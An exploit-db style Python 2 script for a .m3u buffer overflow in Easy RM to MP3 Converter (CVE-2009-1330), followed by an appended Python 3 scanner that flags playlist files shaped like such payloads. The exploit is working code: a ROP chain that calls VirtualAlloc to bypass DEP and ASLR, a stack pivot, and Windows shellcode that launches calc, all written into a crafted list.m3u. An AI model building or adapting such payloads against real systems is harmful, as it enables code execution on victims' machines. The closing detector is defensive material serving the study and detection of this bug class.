# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass
# Date: 2016-06-12
# Exploit Author: Csaba Fitzl
# Vendor Homepage: N/A
# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
# Version: 2.7.3.700
# Tested on: Windows 7 x64
# CVE : CVE-2009-1330
#
# Python 2 script (string literals are byte strings). Repeated gadgets are
# written as list repetitions; the resulting chain is byte-for-byte the same.

import struct


def create_rop_chain():
    # rop chain generated with mona.py - www.corelan.be
    # added missing parts, and some optimisation by Csaba Fitzl
    rop_gadgets = [
        # mov 1000 to EDX - Csaba
        0x41414141,  # Filler (compensate)
        0x41414141,  # Filler (compensate)
        0x41414141,  # Filler (compensate)
        0x10025a1c,  # XOR EDX,EDX # RETN
        0x1002bc3d,  # MOV EAX,411 # RETN
    ]
    # 11 x (ADD EAX,100 # POP EBP # RETN) each followed by a Filler (compensate)
    rop_gadgets += [0x1002dc4c, 0x41414141] * 11
    rop_gadgets += [
        0x1002dc24,  # ADD EAX,80 # POP EBP # RETN
        0x41414141,  # Filler (compensate)
        0x1002dc41,  # ADD EAX,40 # POP EBP # RETN
        0x41414141,  # Filler (compensate)
    ]
    rop_gadgets += [0x1001d2ac] * 11  # ADD EAX,4 # RETN
    rop_gadgets += [0x10023327] * 3   # INC EAX # RETN
    # AT this point EAX = 0x1000
    rop_gadgets += [
        0x1001a788,  # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll]
        0x41414141,  # Filler (compensate)
        0x41414141,  # Filler (compensate)
        0x41414141,  # Filler (compensate)
        0x1001bf0d,  # (RVA : 0x0001bf0d) : # ADC EDX,ESI
        0x41414141,  # Filler (compensate)
        0x10026d56,  # POP EAX # RETN [MSRMfilter03.dll]
        0x10032078,  # ptr to &VirtualAlloc() [IAT MSRMfilter03.dll]
        0x1002e0c8,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSRMfilter03.dll]
        0x1001a788,  # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll]
        0x41414141,  # Filler (compensate)
        0x41414141,  # Filler (compensate)
        0x41414141,  # Filler (compensate)
        0x10027c5a,  # POP EBP # RETN [MSRMfilter03.dll]
        0x1001b058,  # & push esp # ret [MSRMfilter03.dll]
        0x1002b93e,  # POP EAX # RETN [MSRMfilter03.dll]
        0xfffffffb,  # put delta into eax (-> put 0x00000001 into ebx)
        0x1001d2ac,  # ADD EAX,4 # RETN
        0x10023327,  # INC EAX # RETN
        0x10023327,  # INC EAX # RETN
        0x1001bdee,  # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll]
        0x41414141,  # Filler (compensate)
        0x41414141,  # Filler (compensate)
        0x10029f74,  # POP ECX # RETN [MSRMfilter03.dll]
        0xffffffff,  #
    ]
    rop_gadgets += [0x1002dd3e] * 65  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
    rop_gadgets += [
        0x1002bc6a,  # POP EDI # RETN [MSRMfilter03.dll]
        0x1001c121,  # RETN (ROP NOP) [MSRMfilter03.dll]
        0x10026f2b,  # POP EAX # RETN [MSRMfilter03.dll]
        0x10024004,  # address to xor, it will point to the DLL's data section which is writeable. Also will work as NOP
        0x1002bc07,  # PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)


buffersize = 26090
junk = "A" * buffersize
eip = '\x85\x22\x01\x10'  # {pivot 8 / 0x08} :# ADD ESP,8 # RETN
rop = create_rop_chain()
calc = (
    "\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
    "\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
    "\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
    "\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
    "\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
    "\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")
shell = "\x90" * 0x10 + calc
exploit = junk + eip + rop + shell + 'C' * (1000 - len(rop) - len(shell))

filename = "list.m3u"
# binary mode so no byte of the payload is altered by newline translation
with open(filename, 'wb') as textfile:
    textfile.write(exploit)
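A defender-side check, added here and not part of the exploit-db entry above: it scans an .m3u playlist (Python 3) for the shape this bug class relies on, a single entry far longer than any path, a long run of one filler byte, or raw binary where a path should be, so such files can be flagged or quarantined before a vulnerable parser opens them. The thresholds and the two sample playlists are assumptions constructed for this example.

```python
import re
import sys

# Thresholds are assumptions for this example: no real playlist entry is a
# 4 KiB path (Windows MAX_PATH is 260), nor a kilobyte-long run of one byte.
MAX_ENTRY_LEN = 4096
MIN_FILLER_RUN = 1024


def scan_m3u_bytes(data):
    """Return [(line_no, reason), ...] for entries that look like overflow payloads."""
    findings = []
    for no, line in enumerate(data.split(b"\n"), 1):
        line = line.rstrip(b"\r")
        if not line or line.startswith(b"#"):
            continue  # #EXTM3U / #EXTINF directives and comments are never file paths
        if len(line) > MAX_ENTRY_LEN:
            findings.append((no, "entry is %d bytes, limit %d" % (len(line), MAX_ENTRY_LEN)))
        run = re.search(rb"(.)\1{%d,}" % (MIN_FILLER_RUN - 1), line)
        if run:
            findings.append((no, "run of %d x %r" % (len(run.group(0)), run.group(1))))
        if any(b < 0x20 and b != 0x09 or b == 0x7F for b in line):
            findings.append((no, "control bytes inside a playlist entry"))
    return findings


def scan_m3u_file(path):
    with open(path, "rb") as fh:
        return scan_m3u_bytes(fh.read())


# Constructed samples: a normal playlist and one shaped like the exploit above
# (a ~26 KB filler entry followed by raw binary instead of a path).
BENIGN_PLAYLIST = (b"#EXTM3U\r\n"
                   b"#EXTINF:123,Sample Artist - Sample title\r\n"
                   b"C:\\Music\\sample.mp3\r\n"
                   b"http://example.com/stream.mp3\r\n")
OVERFLOW_PLAYLIST = b"#EXTM3U\n" + b"A" * 26090 + b"\x90" * 16 + b"\x01\x02\x03\x04\n"

if __name__ == "__main__":
    targets = sys.argv[1:]
    if targets:
        for path in targets:
            for line_no, reason in scan_m3u_file(path):
                print("%s:%d: %s" % (path, line_no, reason))
    else:
        print("benign   ->", scan_m3u_bytes(BENIGN_PLAYLIST))
        print("overflow ->", scan_m3u_bytes(OVERFLOW_PLAYLIST))
```

Run it with one or more .m3u paths to scan real files; with no arguments it reports on the two embedded samples.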